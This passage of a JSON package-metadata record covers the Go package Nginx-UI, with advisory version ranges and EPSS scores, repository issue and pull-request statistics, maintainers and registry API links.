12:02:13.464Z","epss_percentage":0.00584,"epss_percentile":0.4556,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzc0LW1tNTctODc5Y84AA4Y3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oMzc0LW1tNTctODc5Y84AA4Y3","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20231219195202-ec93ab05a3ec","vulnerable_version_range":"\u003c 1.9.10-0.20231219195202-ec93ab05a3ec"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzc0LW1tNTctODc5Y84AA4Y3/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/0xJacky/Nginx-UI","docker_dependents_count":2,"docker_downloads_count":135,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/0xJacky/Nginx-UI","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/0xJacky/Nginx-UI/dependencies","status":null,"funding_links":["https://github.com/sponsors/nginxui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-22T05:00:52.507Z","issues_count":754,"pull_requests_count":629,"avg_time_to_close_issue":2329523.9320066334,"avg_time_to_close_pull_request":270478.8959435626,"issues_closed_count":603,"pull_requests_closed_count":567,"pull_request_authors_count":44,"issue_authors_count":421,"avg_comments_per_issue":2.722811671087533,"avg_comments_per_pull_request":0.4069952305246423,"merged_pull_requests_count":394,"bot_issues_count":5,"bot_pull_requests_count":408,"past_year_issues_count":65,"past_year_pull_requests_count":45,"past_year_avg_time_to_close_issue":6373350.307692308,"past_year_avg_time_to_close_pull_request":413177.7105263158,"past_year_issues_closed_count":52,"past_year_pull_requests_closed_count":38,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":50,"past_year_avg_comments_per_issue":2.1076923076923078,"past_year_avg_comments_per_pull_request":0.28888888888888886,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":36,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/issues","maintainers":[{"login":"0xJacky","count":121,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/0xJacky"},{"login":"Hintay","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hintay"},{"login":"akinoccc","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/akinoccc"}],"active_maintainers":[{"login":"0xJacky","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/0xJacky"},{"login":"Hintay","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hintay"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2F0xJacky%2FNginx-UI/codemeta","maintainers":[]}